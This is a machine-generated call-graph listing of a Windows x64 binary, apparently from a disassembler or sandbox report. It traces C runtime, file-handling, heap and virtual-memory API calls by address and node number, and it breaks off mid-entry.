7ff6fe09afb3 76004->76006 76007 7ff6fe09afc3 tmpfile 76005->76007 76180 7ff6fe081c78 EnterCriticalSection 76005->76180 76008 7ff6fe09aef8 _set_fmode 14 API calls 76006->76008 76007->75971 76009 7ff6fe09afb8 76008->76009 76181 7ff6fe0a8b14 23 API calls _invalid_parameter_noinfo 76009->76181 76012 7ff6fe09afe7 76013 7ff6fe09af18 _wcsupr_s 55 API calls 76012->76013 76014 7ff6fe09aff0 76013->76014 76015 7ff6fe081c84 _fread_nolock LeaveCriticalSection 76014->76015 76015->76007 76182 7ff6fe0aab1c GetLastError 76016->76182 76018 7ff6fdfe40a9 76019 7ff6fe09b448 23 API calls 4 library calls 76018->76019 76019->75959 76020->75971 76021->75949 76022->75968 76023->75970 76038 7ff6fe0a91ac EnterCriticalSection 76024->76038 76026 7ff6fe0ad6af 76027 7ff6fe0ad70c tmpfile 17 API calls 76026->76027 76028 7ff6fe0ad6ba 76027->76028 76029 7ff6fe0a9200 _isindst LeaveCriticalSection 76028->76029 76030 7ff6fe09b0bd 76029->76030 76030->75986 76030->75987 76039 7ff6fe0ad7f8 76031->76039 76034 7ff6fe0adb16 76034->75990 76036->75984 76040 7ff6fe0ad822 _wcsupr_s 76039->76040 76049 7ff6fe0ad9d5 76040->76049 76054 7ff6fe0bb0e4 26 API calls 3 library calls 76040->76054 76041 7ff6fe09aef8 _set_fmode 14 API calls 76042 7ff6fe0ada9b 76041->76042 76057 7ff6fe0a8b14 23 API calls _invalid_parameter_noinfo 76042->76057 76044 7ff6fe0ad9de 76044->76034 76051 7ff6fe0b1dd8 76044->76051 76046 7ff6fe0ada36 76046->76049 76055 7ff6fe0bb0e4 26 API calls 3 library calls 76046->76055 76048 7ff6fe0ada57 76048->76049 76056 7ff6fe0bb0e4 26 API calls 3 library calls 76048->76056 76049->76041 76049->76044 76058 7ff6fe0b1698 76051->76058 76054->76046 76055->76048 76056->76049 76057->76044 76059 7ff6fe0b16af 76058->76059 76060 7ff6fe0b16cd 76058->76060 76061 7ff6fe09aef8 _set_fmode 14 API calls 76059->76061 76060->76059 76062 7ff6fe0b16e9 76060->76062 76063 7ff6fe0b16b4 76061->76063 76069 7ff6fe0b1cc0 76062->76069 76080 7ff6fe0a8b14 23 API calls _invalid_parameter_noinfo 76063->76080 76067 7ff6fe0b16c0 76067->76034 76082 7ff6fe083ea8 76069->76082 76073 7ff6fe0b1d23 76090 7ff6fe0a4f28 76073->76090 76076 7ff6fe0b1d7b 76078 7ff6fe0b1714 76076->76078 76156 7ff6fe0a9294 14 API calls 2 library calls 76076->76156 76078->76067 76081 7ff6fe0b7978 LeaveCriticalSection 76078->76081 76080->76067 76083 7ff6fe083ecc 76082->76083 76089 7ff6fe083ec7 76082->76089 76084 7ff6fe0aa9a0 TranslateName 26 API calls 76083->76084 76083->76089 76085 7ff6fe083ee7 76084->76085 76086 7ff6fe0aac48 TranslateName 26 API calls 76085->76086 76087 7ff6fe083f0a 76086->76087 76088 7ff6fe0aac7c TranslateName 26 API calls 76087->76088 76088->76089 76089->76073 76155 7ff6fe0a95a0 5 API calls try_get_function 76089->76155 76091 7ff6fe0a4f51 76090->76091 76092 7ff6fe0a4f73 76090->76092 76095 7ff6fe0a9294 __free_lconv_num 14 API calls 76091->76095 76096 7ff6fe0a4f5f 76091->76096 76093 7ff6fe0a4fcc 76092->76093 76097 7ff6fe0a4f77 76092->76097 76094 7ff6fe0b2ff4 _Wcsftime MultiByteToWideChar 76093->76094 76099 7ff6fe0a4fe7 76094->76099 76095->76096 76096->76076 76112 7ff6fe0b1e0c 76096->76112 76097->76096 76100 7ff6fe0a9294 __free_lconv_num 14 API calls 76097->76100 76104 7ff6fe0a4f8b 76097->76104 76098 7ff6fe0a4fee GetLastError 76102 7ff6fe09ae88 wcsftime 14 API calls 76098->76102 76099->76098 76103 7ff6fe0a5027 76099->76103 76107 7ff6fe0a501b 76099->76107 76110 7ff6fe0a9294 __free_lconv_num 14 API calls 76099->76110 76100->76104 76101 7ff6fe0aa290 wcsftime 15 API calls 76101->76096 76106 7ff6fe0a4ffb 76102->76106 76103->76096 76105 7ff6fe0b2ff4 _Wcsftime MultiByteToWideChar 76103->76105 76104->76101 76108 7ff6fe0a506f 76105->76108 76109 7ff6fe09aef8 _set_fmode 14 API calls 76106->76109 76111 7ff6fe0aa290 wcsftime 15 API calls 76107->76111 76108->76096 76108->76098 76109->76096 76110->76107 76111->76103 76113 7ff6fe0b19f0 tmpfile 23 API calls 76112->76113 76114 7ff6fe0b1e53 76113->76114 76115 7ff6fe0b1e81 76114->76115 76116 7ff6fe0b1e99 76114->76116 76117 7ff6fe09aed8 tmpfile 14 API calls 76115->76117 76118 7ff6fe0b79a0 tmpfile 18 API calls 76116->76118 76119 7ff6fe0b1e86 76117->76119 76120 7ff6fe0b1e9e 76118->76120 76125 7ff6fe09aef8 _set_fmode 14 API calls 76119->76125 76121 7ff6fe0b1ebe CreateFileW 76120->76121 76122 7ff6fe0b1ea5 76120->76122 76123 7ff6fe0b1fa4 GetFileType 76121->76123 76124 7ff6fe0b1f29 76121->76124 76126 7ff6fe09aed8 tmpfile 14 API calls 76122->76126 76129 7ff6fe0b1fb1 GetLastError 76123->76129 76130 7ff6fe0b2002 76123->76130 76127 7ff6fe0b1f71 GetLastError 76124->76127 76133 7ff6fe0b1f37 CreateFileW 76124->76133 76128 7ff6fe0b1e92 76125->76128 76131 7ff6fe0b1eaa 76126->76131 76134 7ff6fe09ae88 wcsftime 14 API calls 76127->76134 76128->76076 76135 7ff6fe09ae88 wcsftime 14 API calls 76129->76135 76137 7ff6fe0b78b8 tmpfile 15 API calls 76130->76137 76132 7ff6fe09aef8 _set_fmode 14 API calls 76131->76132 76132->76119 76133->76123 76133->76127 76134->76119 76136 7ff6fe0b1fc0 CloseHandle 76135->76136 76136->76119 76138 7ff6fe0b1ff2 76136->76138 76139 7ff6fe0b2024 76137->76139 76140 7ff6fe09aef8 _set_fmode 14 API calls 76138->76140 76141 7ff6fe0b2074 76139->76141 76143 7ff6fe0b1bfc tmpfile 62 API calls 76139->76143 76142 7ff6fe0b1ff7 76140->76142 76144 7ff6fe0b175c tmpfile 62 API calls 76141->76144 76147 7ff6fe0b207b 76141->76147 76142->76119 76143->76141 76145 7ff6fe0b20b2 76144->76145 76146 7ff6fe0b20bc 76145->76146 76145->76147 76146->76128 76149 7ff6fe0b213c CloseHandle CreateFileW 76146->76149 76148 7ff6fe0ad5d8 tmpfile 26 API calls 76147->76148 76148->76128 76150 7ff6fe0b2183 GetLastError 76149->76150 76154 7ff6fe0b21b1 76149->76154 76151 7ff6fe09ae88 wcsftime 14 API calls 76150->76151 76152 7ff6fe0b2190 76151->76152 76153 7ff6fe0b7ae0 tmpfile 15 API calls 76152->76153 76153->76154 76154->76128 76155->76073 76156->76078 76162 7ff6fdff64e4 94 API calls 76157->76162 76163 7ff6fdfe4490 94 API calls 76157->76163 76164 7ff6fdfdb3d0 94 API calls 76157->76164 76158 7ff6fdfd348c 76172 7ff6fdff0f90 94 API calls 2 library calls 76158->76172 76159 7ff6fdfd2ddf 76159->75995 76159->76157 76159->76158 76161 7ff6fdfd2420 76162->76159 76163->76159 76164->76159 76173 7ff6fdff6f90 76165->76173 76168 7ff6fdff6f90 _mbsncpy_s 10 API calls 76169 7ff6fdff742c 76168->76169 76176 7ff6fdff7010 76169->76176 76172->76161 76175 7ff6fdff8b40 10 API calls 76173->76175 76174 7ff6fdff6fda 76174->76168 76175->76174 76177 7ff6fdff6f90 _mbsncpy_s 10 API calls 76176->76177 76178 7ff6fdff704b 76177->76178 76178->75997 76179->76003 76181->76007 76183 7ff6fe0aab3e 76182->76183 76184 7ff6fe0aab43 76182->76184 76205 7ff6fe0a97e0 6 API calls try_get_function 76183->76205 76188 7ff6fe0aab4b SetLastError 76184->76188 76206 7ff6fe0a9828 6 API calls try_get_function 76184->76206 76187 7ff6fe0aab66 76187->76188 76207 7ff6fe0a921c 76187->76207 76188->76018 76192 7ff6fe0aab97 76216 7ff6fe0a9828 6 API calls try_get_function 76192->76216 76193 7ff6fe0aab87 76214 7ff6fe0a9828 6 API calls try_get_function 76193->76214 76196 7ff6fe0aab9f 76198 7ff6fe0aabb5 76196->76198 76199 7ff6fe0aaba3 76196->76199 76197 7ff6fe0aab8e 76215 7ff6fe0a9294 14 API calls 2 library calls 76197->76215 76218 7ff6fe0aa750 14 API calls _set_fmode 76198->76218 76217 7ff6fe0a9828 6 API calls try_get_function 76199->76217 76203 7ff6fe0aabbd 76219 7ff6fe0a9294 14 API calls 2 library calls 76203->76219 76206->76187 76212 7ff6fe0a922d wcsftime 76207->76212 76208 7ff6fe0a927e 76211 7ff6fe09aef8 _set_fmode 13 API calls 76208->76211 76209 7ff6fe0a9262 RtlAllocateHeap 76210 7ff6fe0a927c 76209->76210 76209->76212 76210->76192 76210->76193 76211->76210 76212->76208 76212->76209 76220 7ff6fe0baddc EnterCriticalSection LeaveCriticalSection wcsftime 76212->76220 76214->76197 76215->76188 76216->76196 76217->76197 76218->76203 76219->76188 76220->76212 76222 7ff6fdfeb9a5 76221->76222 76227 7ff6fdfeb7d8 type_info::_name_internal_method 76221->76227 76229 7ff6fdfeb8f6 76222->76229 76245 7ff6fdfe0950 94 API calls strrchr 76222->76245 76224 7ff6fdfeb980 76239 7ff6fdfec060 76224->76239 76225 7ff6fdfeb966 76244 7ff6fdfebe30 94 API calls type_info::_name_internal_method 76225->76244 76227->76224 76227->76225 76227->76229 76229->75919 76232 7ff6fdfef707 wcsxfrm 76230->76232 76233 7ff6fdfef81e 76232->76233 76236 7ff6fdfef727 wcsxfrm 76232->76236 76247 7ff6fdfe0a70 94 API calls 2 library calls 76233->76247 76235 7ff6fdfef7f0 wcsxfrm 76235->75921 76236->76235 76248 7ff6fdfe0950 94 API calls strrchr 76236->76248 76237->75923 76238->75924 76240 7ff6fdfe8d00 _free_nolock 94 API calls 76239->76240 76241 7ff6fdfec09a Concurrency::details::_UnrealizedChore::_CancelViaToken memcpy_s 76240->76241 76242 7ff6fdfec285 76241->76242 76246 7ff6fdfeb310 94 API calls 3 library calls 76241->76246 76242->76229 76244->76229 76245->76229 76246->76242 76247->76235 76248->76235 76250 7ff6fe09a9a4 76249->76250 76263 7ff6fe09aa57 memcpy_s 76249->76263 76252 7ff6fe09a9bb 76250->76252 76255 7ff6fe09aa67 76250->76255 76251 7ff6fe09aef8 _set_fmode 14 API calls 76253 7ff6fdfd5487 76251->76253 76271 7ff6fe0a91ac EnterCriticalSection 76252->76271 76267 7ff6fdfddd30 76253->76267 76257 7ff6fe0aab1c _set_fmode 14 API calls 76255->76257 76255->76263 76258 7ff6fe09aa83 76257->76258 76258->76263 76272 7ff6fe0aa290 76258->76272 76263->76251 76263->76253 76268 7ff6fdfddd6f wcsxfrm 76267->76268 76281 7ff6fdfd2f8a 76268->76281 76270 7ff6fdfd54b8 76270->75934 76273 7ff6fe0aa29f wcsftime 76272->76273 76274 7ff6fe0aa2db 76272->76274 76273->76274 76276 7ff6fe0aa2c2 HeapAlloc 76273->76276 76280 7ff6fe0baddc EnterCriticalSection LeaveCriticalSection wcsftime 76273->76280 76275 7ff6fe09aef8 _set_fmode 14 API calls 76274->76275 76278 7ff6fe0aa2e0 76275->76278 76276->76273 76277 7ff6fe0aa2d9 76276->76277 76277->76278 76278->76263 76280->76273 76282 7ff6fdfd2ddf 76281->76282 76282->76270 76283 7ff6fdfd348c 76282->76283 76286 7ff6fdff64e4 94 API calls 76282->76286 76287 7ff6fdfe4490 94 API calls 76282->76287 76288 7ff6fdfdb3d0 94 API calls 76282->76288 76289 7ff6fdff0f90 94 API calls 2 library calls 76283->76289 76285 7ff6fdfd2420 76286->76282 76287->76282 76288->76282 76289->76285 76290->75941 76291->75943 76293 7ff6fdfef8d7 76292->76293 76295 7ff6fdfefb04 strrchr 76293->76295 76296 7ff6fdfefb0b wcsxfrm 76293->76296 76299 7ff6fdfef8fa wcsxfrm 76293->76299 76298 7ff6fdfef941 wcsxfrm 76295->76298 76311 7ff6fdfe0950 94 API calls strrchr 76295->76311 76296->76295 76310 7ff6fdfe0a70 94 API calls 2 library calls 76296->76310 76298->75837 76299->76295 76299->76298 76300 7ff6fdfefa6d 76299->76300 76304 7ff6fdfefa81 76299->76304 76307 7ff6fdfe0950 94 API calls strrchr 76300->76307 76302 7ff6fdfefa7f 76309 7ff6fdfed290 94 API calls wcsxfrm 76302->76309 76304->76302 76308 7ff6fdfe0950 94 API calls strrchr 76304->76308 76306->75838 76307->76302 76308->76302 76309->76295 76310->76295 76311->76298 76312->75846 76313->75855 76315 7ff6fe01ee25 76314->76315 76316 7ff6fe01ee4a 76315->76316 76331 7ff6fdfe1310 94 API calls __ExceptionPtrDestroy 76315->76331 76316->75684 76318 7ff6fe05dc40 76316->76318 76319 7ff6fe05dc70 76318->76319 76327 7ff6fe05ddcc _handle_error _mbsncpy_s 76319->76327 76332 7ff6fe05de50 76319->76332 76321 7ff6fe05dd15 76353 7ff6fdfd5074 76321->76353 76323 7ff6fe05dd4a 76324 7ff6fe05dd81 76323->76324 76356 7ff6fdfed720 94 API calls 3 library calls 76323->76356 76357 7ff6fe05e6e0 94 API calls memcpy_s 76324->76357 76327->75684 76328->75689 76329->75686 76330->75685 76331->76316 76333 7ff6fe05debb memcpy_s 76332->76333 76334 7ff6fe05df15 76333->76334 76358 7ff6fe05da60 94 API calls wcsxfrm 76333->76358 76338 7ff6fe05e64c 76334->76338 76339 7ff6fe05e18f 76334->76339 76349 7ff6fe05df1c 76334->76349 76337 7ff6fe05e391 76364 7ff6fe050960 96 API calls memcpy_s 76337->76364 76341 7ff6fe05e665 76338->76341 76365 7ff6fdfe1010 94 API calls std::rsfun 76338->76365 76342 7ff6fe05e212 76339->76342 76347 7ff6fe05e1af 76339->76347 76359 7ff6fdfe1010 94 API calls std::rsfun 76339->76359 76341->76321 76360 7ff6fe05dac0 94 API calls 76342->76360 76346 7ff6fe05e513 76346->76321 76348 7ff6fe05e30d 76347->76348 76347->76349 76351 7ff6fe05e2c8 76347->76351 76348->76349 76362 7ff6fe05da60 94 API calls wcsxfrm 76348->76362 76349->76337 76363 7ff6fdfe1010 94 API calls std::rsfun 76349->76363 76351->76349 76361 7ff6fe05da60 94 API calls wcsxfrm 76351->76361 76354 7ff6fdfd508b CreateMutexW 76353->76354 76354->76323 76356->76324 76357->76327 76358->76334 76359->76342 76360->76347 76361->76349 76362->76349 76363->76337 76364->76346 76365->76341 76367 7ff6fdfe8d00 _free_nolock 94 API calls 76366->76367 76368 7ff6fdfdad2f 76367->76368 76368->75697 76370 7ff6fdfe0950 94 API calls strrchr 76368->76370 76369->75695 76370->75697 76402 7ff6fdff77f0 76371->76402 76373 7ff6fdff731f 76374 7ff6fdff72f8 76373->76374 76407 7ff6fdfe05a0 94 API calls 2 library calls 76373->76407 76374->75702 76375 7ff6fdff77f0 _wcsupr_s 94 API calls 76377 7ff6fdff72d0 76375->76377 76377->76373 76377->76374 76377->76375 76381 7ff6fdff7315 76377->76381 76379 7ff6fdff77f0 _wcsupr_s 94 API calls 76379->76377 76380 7ff6fdff737f _wcsupr_s 76408 7ff6fdfe0600 5 API calls _free_nolock 76380->76408 76406 7ff6fdff78c0 94 API calls _wcsupr_s 76381->76406 76385 7ff6fe004c45 76384->76385 76445 7ff6fe005c90 76385->76445 76390 7ff6fe004c90 76391 7ff6fe004dd5 76390->76391 76474 7ff6fe004e10 94 API calls 2 library calls 76390->76474 76391->75707 76395 7ff6fe004c62 76395->76390 76457 7ff6fe0051c0 76395->76457 76461 7ff6fe005170 76395->76461 76465 7ff6fe004840 76395->76465 76472 7ff6fe004e10 94 API calls 2 library calls 76395->76472 76473 7ff6fdfdad60 94 API calls _free_nolock 76395->76473 76398->75711 76399->75701 76400->75707 76401->75709 76403 7ff6fdff7834 76402->76403 76405 7ff6fdff7250 76402->76405 76409 7ff6fdff7700 76403->76409 76405->76377 76405->76379 76406->76373 76407->76380 76408->76374 76414 7ff6fdfe4600 76409->76414 76411 7ff6fdff773d 76411->76405 76420 7ff6fe09b000 76414->76420 76418 7ff6fdfe462e 76418->76411 76419 7ff6fdfe0690 94 API calls 2 library calls 76418->76419 76419->76411 76421 7ff6fe09b009 76420->76421 76422 7ff6fdfe462a 76420->76422 76423 7ff6fe09aef8 _set_fmode 14 API calls 76421->76423 76422->76418 76426 7ff6fe09b380 76422->76426 76424 7ff6fe09b00e 76423->76424 76429 7ff6fe0a8b14 23 API calls _invalid_parameter_noinfo 76424->76429 76430 7ff6fe09b3a0 76426->76430 76429->76422 76431 7ff6fe09b398 76430->76431 76432 7ff6fe09b3ca 76430->76432 76431->76418 76432->76431 76433 7ff6fe09b416 76432->76433 76434 7ff6fe09b3d9 memcpy_s 76432->76434 76443 7ff6fe081c78 EnterCriticalSection 76433->76443 76436 7ff6fe09aef8 _set_fmode 14 API calls 76434->76436 76438 7ff6fe09b3ee 76436->76438 76437 7ff6fe09b41e 76439 7ff6fe09b120 _fread_nolock 37 API calls 76437->76439 76444 7ff6fe0a8b14 23 API calls _invalid_parameter_noinfo 76438->76444 76441 7ff6fe09b435 76439->76441 76442 7ff6fe081c84 _fread_nolock LeaveCriticalSection 76441->76442 76442->76431 76444->76431 76446 7ff6fe0051c0 94 API calls 76445->76446 76448 7ff6fe005ca8 76446->76448 76447 7ff6fe005d8b 76449 7ff6fe005dcf 76447->76449 76450 7ff6fe005d96 std::rsfun 76447->76450 76448->76447 76455 7ff6fe004c4f 76448->76455 76475 7ff6fe01e570 94 API calls 3 library calls 76448->76475 76452 7ff6fe005170 94 API calls 76449->76452 76453 7ff6fdfeb7a0 type_info::_name_internal_method 94 API calls 76450->76453 76454 7ff6fe005deb 76452->76454 76453->76455 76456 7ff6fdfeb7a0 type_info::_name_internal_method 94 API calls 76454->76456 76455->76395 76471 7ff6fe004e10 94 API calls 2 library calls 76455->76471 76456->76455 76458 7ff6fe0051f9 76457->76458 76459 7ff6fe0051e8 76457->76459 76458->76395 76476 7ff6fe004ed0 76459->76476 76462 7ff6fe0051ac 76461->76462 76463 7ff6fe005198 76461->76463 76462->76395 76464 7ff6fe004ed0 94 API calls 76463->76464 76464->76462 76467 7ff6fe00486e 76465->76467 76466 7ff6fdfe8da0 wcsxfrm 94 API calls 76468 7ff6fe0049ac 76466->76468 76467->76466 76489 7ff6fe005790 94 API calls type_info::_name_internal_method 76468->76489 76470 7ff6fe004ad7 76470->76395 76471->76395 76472->76395 76473->76395 76474->76391 76475->76448 76477 7ff6fe004eec 76476->76477 76483 7ff6fe004f06 memcpy_s 76477->76483 76486 7ff6fe004e10 94 API calls 2 library calls 76477->76486 76479 7ff6fe005023 76480 7ff6fe005039 76479->76480 76487 7ff6fe004e10 94 API calls 2 library calls 76479->76487 76480->76458 76483->76479 76483->76480 76484 7ff6fe004790 94 API calls 76483->76484 76485 7ff6fdfe4600 39 API calls 76483->76485 76488 7ff6fdfe0690 94 API calls 2 library calls 76483->76488 76484->76483 76485->76483 76486->76483 76487->76480 76488->76483 76489->76470 76491 7ff6fe03a9b7 76490->76491 76526 7ff6fe03a900 76491->76526 76493 7ff6fe03aa15 76530 7ff6fdff37c0 76493->76530 76495 7ff6fe03aa87 76533 7ff6fe02aa20 76495->76533 76501 7ff6fe03f750 5 API calls 76510 7ff6fe03abb7 76501->76510 76502 7ff6fe03f660 94 API calls 76502->76510 76504 7ff6fe03b460 94 API calls 76504->76510 76509 7ff6fe03aebf memcpy_s 76556 7ff6fe03f750 76509->76556 76510->76501 76510->76502 76510->76504 76510->76509 76512 7ff6fdff37c0 94 API calls 76510->76512 76542 7ff6fe04e3a0 76510->76542 76546 7ff6fe03e150 76510->76546 76552 7ff6fe0421b0 76510->76552 76560 7ff6fe04e040 94 API calls 76510->76560 76561 7ff6fe04cc10 RtlCaptureContext RtlLookupFunctionEntry RtlRestoreContext RtlVirtualUnwind RaiseException 76510->76561 76562 7ff6fe0404a0 94 API calls 76510->76562 76563 7ff6fe04d4f0 94 API calls 2 library calls 76510->76563 76512->76510 76515 7ff6fe03aff8 _handle_error 76515->75715 76517 7ff6fdff5611 76516->76517 76601 7ff6fe02aa90 76517->76601 76519 7ff6fdff597e 76519->75717 76520 7ff6fdff583b 76520->76519 76604 7ff6fe04ee70 94 API calls 2 library calls 76520->76604 76522 7ff6fdff589d 76522->76519 76523 7ff6fdfeb7a0 type_info::_name_internal_method 94 API calls 76522->76523 76524 7ff6fdff58e9 Concurrency::details::_UnrealizedChore::_CancelViaToken 76523->76524 76605 7ff6fe04f070 94 API calls _wcsupr_s 76524->76605 76527 7ff6fe03a926 76526->76527 76528 7ff6fe03a930 76526->76528 76565 7ff6fe055d90 94 API calls _free_nolock 76527->76565 76528->76493 76531 7ff6fdfe8d00 _free_nolock 94 API calls 76530->76531 76532 7ff6fdff383b memcpy_s 76531->76532 76532->76495 76534 7ff6fe02aa49 76533->76534 76535 7ff6fe02aa3d 76533->76535 76569 7ff6fe02aee0 76534->76569 76566 7ff6fe02b0e0 76535->76566 76538 7ff6fe02aa47 76539 7ff6fe04c660 76538->76539 76592 7ff6fe042a10 94 API calls Concurrency::details::_UnrealizedChore::_CancelViaToken 76539->76592 76541 7ff6fe04c685 76541->76510 76543 7ff6fe04e3e6 76542->76543 76545 7ff6fe04e5dd 76543->76545 76593 7ff6fdff36b0 5 API calls 2 library calls 76543->76593 76545->76510 76548 7ff6fe03e16f 76546->76548 76547 7ff6fe03e273 76547->76510 76549 7ff6fe03e1e6 76548->76549 76594 7ff6fe03b460 76548->76594 76549->76547 76551 7ff6fe03b460 94 API calls 76549->76551 76551->76549 76554 7ff6fe0421c8 type_info::_name_internal_method 76552->76554 76553 7ff6fe042291 76553->76510 76554->76553 76599 7ff6fe03e540 94 API calls Concurrency::details::_UnrealizedChore::_CancelViaToken 76554->76599 76557 7ff6fe03f775 76556->76557 76558 7ff6fe03af63 76556->76558 76557->76558 76600 7ff6fdff36b0 5 API calls 2 library calls 76557->76600 76558->76515 76564 7ff6fdff36b0 5 API calls 2 library calls 76558->76564 76560->76510 76561->76510 76562->76510 76563->76510 76564->76515 76565->76528 76575 7ff6fe02af50 76566->76575 76570 7ff6fe02af2e 76569->76570 76571 7ff6fe02aefe 76569->76571 76570->76538 76589 7ff6fe02ade0 VirtualProtect 76571->76589 76580 7ff6fe02af88 Concurrency::details::_UnrealizedChore::_CancelViaToken 76575->76580 76576 7ff6fe02b0c3 76587 7ff6fdff36b0 5 API calls 2 library calls 76576->76587 76578 7ff6fe02b03b 76578->76538 76580->76576 76580->76578 76582 7ff6fe02ad30 VirtualAlloc 76580->76582 76586 7ff6fe02ada0 VirtualFree 76580->76586 76583 7ff6fe02ad87 76582->76583 76584 7ff6fe02ad70 76582->76584 76583->76580 76584->76583 76588 7ff6fdff36b0 5 API calls 2 library calls 76584->76588 76586->76580 76587->76578 76588->76583 76590 7ff6fe02ae11 76589->76590 76590->76570 76591 7ff6fe02ae40 94 API calls 2 library calls 76590->76591 76591->76570 76592->76541 76593->76545 76595 7ff6fe03b48d 76594->76595 76596 7ff6fe03b483 76594->76596 76595->76548 76598 7ff6fe03b410 94 API calls 76596->76598 76598->76595 76599->76554 76600->76558 76602 7ff6fe02aee0 94 API calls 76601->76602 76603 7ff6fe02aabe 76602->76603 76603->76520 76604->76522 76605->76519 76607 7ff6fdfdb3ed 76606->76607 76608 7ff6fdfe8484 76606->76608 76610 7ff6fdfe8420 76607->76610 76608->76607 76614 7ff6fdfea690 76608->76614 76611 7ff6fdfe8429 76610->76611 76612 7ff6fdfdb3f7 76611->76612 76621 7ff6fdfea850 76611->76621 76612->75612 76615 7ff6fdfea707 76614->76615 76616 7ff6fdfd2f8a 94 API calls 76615->76616 76617 7ff6fdfea7dd 76616->76617 76618 7ff6fdfea844 76617->76618 76620 7ff6fdfe0600 5 API calls _free_nolock 76617->76620 76618->76608 76620->76618 76622 7ff6fdfea888 76621->76622 76623 7ff6fdfea8bd 76622->76623 76626 7ff6fdfea9a3 wcsxfrm 76622->76626 76630 7ff6fdfed720 94 API calls 3 library calls 76623->76630 76625 7ff6fdfea99e 76625->76611 76626->76625 76627 7ff6fdfea690 94 API calls 76626->76627 76627->76625 76628 7ff6fdfea94c 76628->76625 76629 7ff6fdfea690 94 API calls 76628->76629 76629->76625 76630->76628 76632 7ff6fdfe3d67 76631->76632 76633 7ff6fdfe3cbf 76631->76633 76644 7ff6fdfe2320 94 API calls _free_nolock 76632->76644 76643 7ff6fdfe2320 94 API calls _free_nolock 76633->76643 76636 7ff6fdfe310f 76636->75728 76636->75729 76639 7ff6fdff4020 76637->76639 76638 7ff6fdfd3037 _mbsncpy_s 94 API calls 76638->76639 76639->76638 76640 7ff6fdff4089 76639->76640 76640->75731 76641->75735 76642->75735 76643->76636 76644->76636 76645 7ff6fdfd4a01 76646 7ff6fdfd4a0c 76645->76646 76649 7ff6fdfd4a30 76645->76649 76646->76649 76650 7ff6fdfe2dc0 76646->76650 76664 7ff6fdff40a0 96 API calls _set_fmode 76649->76664 76651 7ff6fe09aef8 _set_fmode 14 API calls 76650->76651 76652 7ff6fdfe2dd3 GetLastError 76651->76652 76653 7ff6fdfe2e77 76652->76653 76654 7ff6fdfe2ee6 76653->76654 76655 7ff6fdff3fc0 94 API calls 76653->76655 76656 7ff6fdfe2f35 wcsxfrm 76654->76656 76665 7ff6fdfe3a80 98 API calls _handle_error 76654->76665 76655->76654 76662 7ff6fdfe3005 76656->76662 76666 7ff6fdfe3a80 98 API calls _handle_error 76656->76666 76657 7ff6fdfe3074 76659 7ff6fe09aef8 _set_fmode 14 API calls 76657->76659 76660 7ff6fdfe3079 SetLastError 76659->76660 76660->76649 76662->76657 76667 7ff6fdfe3a80 98 API calls _handle_error 76662->76667 76664->76649 76665->76656 76666->76662 76667->76657 76668 7ff6fdfd1a21 76671 7ff6fdfefd90 76668->76671 76670 7ff6fdfd1a47 76670->76670 76681 7ff6fdfefdb8 76671->76681 76672 7ff6fdfefeb0 wcsxfrm 76686 7ff6fdfeff71 strrchr _mbsncpy_s 76672->76686 76698 7ff6fdfe0a70 94 API calls 2 library calls 76672->76698 76676 7ff6fdff02a6 76677 7ff6fdff02fd 76676->76677 76678 7ff6fdff02b7 76676->76678 76682 7ff6fdff037d 76677->76682 76687 7ff6fdff0333 76677->76687 76700 7ff6fe00e9c0 94 API calls 76678->76700 76681->76672 76681->76676 76681->76686 76691 7ff6fdfef2a0 76681->76691 76695 7ff6fdfef2f0 76681->76695 76699 7ff6fdfe0950 94 API calls strrchr 76681->76699 76684 7ff6fdff0383 76682->76684 76685 7ff6fdff0396 76682->76685 76683 7ff6fdff02f8 76683->76670 76702 7ff6fe001a40 94 API calls 2 library calls 76684->76702 76703 7ff6fe022fe0 94 API calls type_info::_name_internal_method 76685->76703 76686->76670 76701 7ff6fe00e9c0 94 API calls 76687->76701 76692 7ff6fdfef2d5 76691->76692 76693 7ff6fdfef2c7 76691->76693 76692->76681 76704 7ff6fe00e3f0 94 API calls 3 library calls 76693->76704 76696 7ff6fdfeb7a0 type_info::_name_internal_method 94 API calls 76695->76696 76697 7ff6fdfef32a 76696->76697 76697->76681 76698->76686 76699->76681 76700->76683 76701->76683 76702->76683 76703->76683 76704->76692 76705 7ff6fdff56dc 76716 7ff6fe03b100 76705->76716 76708 7ff6fe02aa90 94 API calls 76710 7ff6fdff583b 76708->76710 76709 7ff6fdff597e 76710->76709 76721 7ff6fe04ee70 94 API calls 2 library calls 76710->76721 76712 7ff6fdff589d 76712->76709 76713 7ff6fdfeb7a0 type_info::_name_internal_method 94 API calls 76712->76713 76714 7ff6fdff58e9 Concurrency::details::_UnrealizedChore::_CancelViaToken 76713->76714 76722 7ff6fe04f070 94 API calls _wcsupr_s 76714->76722 76723 7ff6fe02ab10 76716->76723 76718 7ff6fe02ab10 94 API calls 76720 7ff6fdff5725 76718->76720 76719 7ff6fe03b138 76719->76718 76720->76708 76721->76712 76722->76709 76724 7ff6fe02ab2a 76723->76724 76725 7ff6fe02ab81 76723->76725 76727 7ff6fe02ab3d 76724->76727 76728 7ff6fe02ab4e 76724->76728 76726 7ff6fe02abd2 76725->76726 76729 7ff6fe02abbc 76725->76729 76733 7ff6fe02ab4c 76726->76733 76735 7ff6fe02ade0 VirtualProtect 76726->76735 76730 7ff6fe02aee0 94 API calls 76727->76730 76731 7ff6fe02ade0 VirtualProtect 76728->76731 76732 7ff6fe02aee0 94 API calls 76729->76732 76730->76733 76734 7ff6fe02ab67 76731->76734 76732->76733 76733->76719 76734->76733 76739 7ff6fe02ae40 94 API calls 2 library calls 76734->76739 76736 7ff6fe02ac1f 76735->76736 76736->76733 76740 7ff6fe02ae40 94 API calls 2 library calls 76736->76740 76739->76733 76740->76733 76741 7ff6fe07d4e4 76766 7ff6fe07d6a8 76741->76766 76744 7ff6fe07d630 76794 7ff6fe07d9d4 7 API calls 2 library calls 76744->76794 76745 7ff6fe07d500 __scrt_acquire_startup_lock 76747 7ff6fe07d63a 76745->76747 76749 7ff6fe07d51e 76745->76749 76795 7ff6fe07d9d4 7 API calls 2 library calls 76747->76795 76754 7ff6fe07d53f __scrt_release_startup_lock 76749->76754 76774 7ff6fe0a675c 76749->76774 76751 7ff6fe07d543 76752 7ff6fe07d645 _free_nolock _CallSETranslator 76753 7ff6fe07d5c9 76779 7ff6fe07db20 76753->76779 76754->76751 76754->76753 76791 7ff6fe09adf8 26 API calls 76754->76791 76756 7ff6fe07d5ce 76782 7ff6fe0a6688 76756->76782 76763 7ff6fe07d5f1 76763->76752 76793 7ff6fe07d83c 7 API calls __scrt_initialize_crt 76763->76793 76765 7ff6fe07d608 76765->76751 76796 7ff6fe07dc9c 76766->76796 76769 